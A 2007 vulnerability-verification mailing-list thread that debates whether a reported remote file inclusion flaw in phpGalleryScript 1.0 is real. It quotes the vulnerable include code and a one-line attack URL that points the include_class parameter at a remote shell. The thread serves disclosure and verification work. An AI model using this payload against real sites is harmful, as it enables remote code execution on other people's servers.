[VIM] false: phpGalleryScript 1.0 - File Inclusion Vulnerabilities

str0ke str0ke at milw0rm.com
Tue Apr 10 20:35:32 UTC 2007

Ahh didn't think about that :)


On 4/10/07, rkeith at securityfocus.com <rkeith at securityfocus.com> wrote:
> dirname("http://milw0rm.com/test") => http://milw0rm.com
> Looks valid to me.
> --
> Rob Keith
> Symantec
> On Tue, 10 Apr 2007, str0ke wrote:
> > init.gallery.php
> > #######################3
> >
> > $inc_path = dirname($include_class);
> > require ($inc_path."/class.gallery.php");
> > include($inc_path."/config.gallery.php");
> > ....
> > #######################3
> >
> > dirname("http://milw0rm.com") == http:
> >
> > /str0ke
> >
> > ---------- Forwarded message ----------
> > From: z12xxa at gmail.com <z12xxa at gmail.com>
> > Date: 9 Apr 2007 23:19:32 -0000
> > Subject: phpGalleryScript 1.0 - File Inclusion Vulnerabilities
> > To: bugtraq at securityfocus.com
> >
> >
> > vendor url: http://tomex.org/
> >
> > http://[victim]/php/init.gallery.php?include_class=[SHELL]
> >

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